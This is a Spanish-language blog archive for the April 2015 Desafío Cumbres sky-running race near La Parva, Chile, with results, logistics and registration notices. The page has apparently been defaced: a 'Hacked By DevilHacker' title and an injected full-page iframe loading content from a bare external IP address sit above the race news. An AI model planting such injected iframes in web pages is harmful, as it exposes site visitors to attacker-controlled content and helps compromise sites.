<title>Hacked By DevilHacker</title>
<div dir="rtl" style="text-align: right;" trbidi="on">


<center><iframe height="1000" src="http://131.72.236.68/~ahumadod/index.php" width="1300"></iframe></div></center>


</div>

Monthly Archives: abril 2015

You are browsing the site archives by month.

Gran cierre Desafío Cumbres!

Concluye con tremendo éxito la tercera versión del Desafío Cumbres Mountain Hardwear.

Con un día espectacular, más de 100 atletas se congregaron en los faldeos del cerro Parva a los 3.570 msnm., para dar comienzo a la tercera versión del Desafío Cumbres, esta tremenda competencia de Sky Running que recorre 20K y 24K en las respectivas categorías, alcanzando cumbres de hasta 4.950 msnm.

Los corredores comenzaron a llegar al campamento a eso de las 8:30 hrs., y a prepararse para la difícil prueba que les esperaba, completar un recorrido altamente técnico, con poco oxígeno, y en el menor tiempo posible.

web1

Una vez que el Helicóptero y los camarógrafos estuvieron posicionados, se dio inicio a la carrera. Con gran entusiasmo los corredores se ordenaban en fila mientras subían la inclinada primera fase de la carrera, el cerro Falsa Parva.

Los punteros comenzaron a tomar ventaja mientras todos alcanzaban una a un las primeras cumbres del recorrido. Nieve en la ruta dificultaba un poco el andar de los corredores, sobre todo en el sector del Filo Leonera.

En el campamento todos permanecían expectantes, y la jornada se alargaba. Luego de 3 horas se divisa al fin a los primeros corredores acercándose hacia el campamento. El primer corredor de 3 Cumbres en cruza la meta es el francés Guillaume Daudon, con un tiempo de 3 horas y 17 minutos, seguido muy de cerca por el chileno Felipe Bishara con un tiempo de 3 horas y 18 minutos.

web3

En mujeres 3 Cumbres la ganadora fue Daniela Davanzo con un tiempo de 4 horas en punto. Seguida por Teresita Gomez, con un tiempo de 4 horas y 11 minutos.

En 4 Cumbres el más rápido fue Luís Valle, con un tiempo de 3 horas y 45 minutos, mientras que por muy poca diferencia en segundo lugar llegó Pedro Pablo “Pepa” Sermini, ganador 2013, con un tiempo de 3 horas y 46 minutos, y en tercer lugar quedó el Catalán Nil Bacardit, ganador 2014, quién este año realizó un tiempo de 3 horas y 49 minutos.

En mujeres 4 Cumbres la ganadora indiscutida fue Marlene Flores, quién llegó a la meta con un tiempo de 4 horas y 58 minutos, mientras que en segundo lugar y con bastante ventaja quedó Rosita Rojas, con un tiempo de 5 horas y 55 minutos.

web2

Y así concluye esta tercera versión del Desafío Cumbres de Mountain Hardwear. Queremos agradecer a todos quienes hicieron posible este gran evento, principalmente a las marcas Mountain Hardwear y Tissot, por supuesto a Valle Nevado y La Parva, y por último a la clínica UC San Carlos, quienes nos brindaron un gran apoyo médico.

Nos vemos en la montaña!

Equipo Desafío Cumbres

Archivo:

Revisa acá las Fotos

Revisa acá los Resultados

Pronto el Video 2015….

Último Comunicado (antes de la charla)

Estimados corredores,

Este es el último comunicado antes de la charla del día jueves, y es simplemente para recordarles algunos puntos importantes y otras cosas a tener en cuenta para el día de la carrera.

La Parva

La entrada al estacionamiento del Telesilla Águilas (Bike Park), es un acceso que comienza desde la calle Emile Alais (calle principal), justo una curva antes de que termine. En esta foto se muestra la ubicación del estacionamiento, con respecto a La Parva.

estacionamientobikepark (1)

La Parva nos comunicó nuevos horarios en el uso del Telesilla Águilas. Este abrirá en la mañana desde las 08:00 hrs., hasta última persona subiendo a las 10:00 hrs. En la tarde los horarios serán de 16:00 hrs., hasta última persona bajando a las 17:15 hrs. Esto nos restringe bastante la bajada, por lo que además tendremos vehículos 4×4 realizando Laps para quienes no alcancen a bajar por la silla (recomendamos a todos que bajen por la silla, es lo más rápido).

Campamento

El día viernes el equipo de producción estará acampando en la partida de la carrera. Quienes quieran subir y quedarse arriba lo pueden hacer, pero deben subir por Valle Nevado con vehículos 4×4, solo necesito que me envíen sus datos (Nombre, Rut, Marca/Modelo/Color y Patente) al mail desafiocumbres@gmail.com

Les recordamos que para quedarse arriba deben llevar su equipo de campamento: Carpa, saco de dormir, colchoneta, comida, etc. Es importante mencionar que el campamento tiene harto movimiento de gente fuera de horario, generadores funcionando, etc.

Para quienes estén esperando en el campamento durante la carrera, tendremos habilitado algunos sectores cómodos, con agua, frutas, y baños (a 300 mts). Además, para quienes quieran estirar las piernas, habrá un guía que realizará una ascensión al cerro Falsa Parva desde las 10:30 hrs. en adelante. Desde las 14:30 hrs. comenzará un rico cóctel abierto a todos los presentes. Por la restricción horaria la premiación la adelantaremos, comenzando a las 15:45 hrs. Para terminar a las 16:15 hrs. momento en que todos deben acercarse a la silla Águilas para comenzar el descenso.

Les recuerdo la invitación a la Charla Técnica este jueves 23 a las 19 hrs. en la tienda Mountain Hardwear del Mallsport.

Saludos y nos vemos pronto!

Equipo Desafío Cumbres

Varios pre-carrera

1234

Ya estamos cada vez más cerca de la carrera y comenzamos a ponernos nerviosos! Esperamos que todos hayan tenido la oportunidad de prepararse.

Les cuento que hoy jueves 16 y mañana viernes 17 son los últimos días para retirar los Kits en la tienda Mountain Hardwear del Costanera Center. Para quienes se inscribieron después del primer cierre de inscripciones, sus Kits los pueden retirar durante la charla técnica, en la tienda Mountain Hardwear del Mallsport, el día jueves 23 de abril desde las 19 hrs. o bien, el día de la carrera en la Base de la silla Águilas, en La Parva.

Ruta y tiempos de carrera:

Hemos estado realizando subidas al sector de la carrera, y nos encontramos con condiciones de nieve dura y hielo en algunos tramos de la ruta. Esto podría retrasar a los corredores a alcanzar las cumbres en los tiempos definidos en las Bases de Competencia. Es por esto que decidimos aumentar estos tiempos a los siguientes:

Categoría Cumbre Cerro Pintor Filo de Ascensión Leonera Cumbre Leonera
3 CUMBRES 01:50 hrs. 02:20 hrs. 03:00 hrs. 03:50 hrs.
4 CUMBRES 01:20 hrs. 01:40 hrs. 02:10 hrs. 02:50 hrs. 03:20 hrs. 04:40 hrs.

Durante la próxima semana habrá un pequeño frente de mal tiempo el día lunes, lo que podría dejar un poco más de nieve en la ruta. Es por esto que podrían haber otros cambios dependiendo de las nevadas, estos se comunicarán durante la charla técnica el jueves 23, o bien el día sábado 25 a las 09:15 hrs. antes de la partida de la carrera.

Para este tipo de carrera, en condiciones de alta montaña, recomendamos a todos los corredores siempre utilizar casco. Recordamos que para los corredores de 3 Cumbres el uso de casco es obligatorio. Además de esto, recomendamos llevar ropa abrigada, zapatos o zapatillas impermeables, polainas, y todo lo necesario para no pasar frío.

Charla Técnica:

Les recordamos a todos que están invitados a venir a la charla técnica, para que puedan escuchar de los propios organizadores, sobre las condiciones de la ruta, medidas de seguridad, sistema de competencia, cambios, etc. Además tendremos un rico coctel, 30% de descuento en productos Mountain Hardwear para corredores inscritos, y el sorteo de un reloj Tissot de última generación!

Les recuerdo que cualquier duda que tengan nos pueden escribir a desafiocumbres@gmail.com

No se olviden asistir a la Charla técnica el día jueves!

Nos vemos pronto. Saludos!

Últimas Noticias

3

Hola corredores, listos para el Desafío? Las inscripciones cerraron el día 8 de abril, pero hemos recibido muchas solicitudes de quienes se convencieron tarde y ahora quieren participar! por lo que tomamos la decisión de abrir nuevas fechas de inscripción para los días miércoles 15 y jueves 16 de abril, desde las 10:00 y hasta las 20:00 hrs. o hasta llenar los cupos, solo habrán 10 cupos por categoría.

Quienes se inscriban durante estas fechas podrán retirar el Kit durante la charla técnica del día 23 de abril, a las 19 hrs. en el Mallsport, o bien en la Base del andarivel Águilas, el mismo día de la carrera, desde las 07:30 y hasta las 09:00 hrs.

2

Les recordamos que quienes quieran ir a entrenar, el acceso por la Parva está abierto solo hasta el estacionamiento de la Base del telesilla Águilas. El andarivel estará cerrado durante la semana. El día sábado 18 de abril el andarivel estará abierto para todo público, por un valor de $5.000 p/p.

El resto de los días el andarivel no estará abierto, solo el acceso hasta el estacionamiento, luego se puede continuar a pie.

Les contamos además que entre los atletas confirmados se encuentra Marlene Flores, Rodrigo “Canuto” Errazuriz, Rodolfo “Pre” Díaz, Veronica Bravo, Pedro Pablo Sermini, Israel Escudero, Nil Bacardit, Leo Gallardo, entre muchos otros.

A entrenar!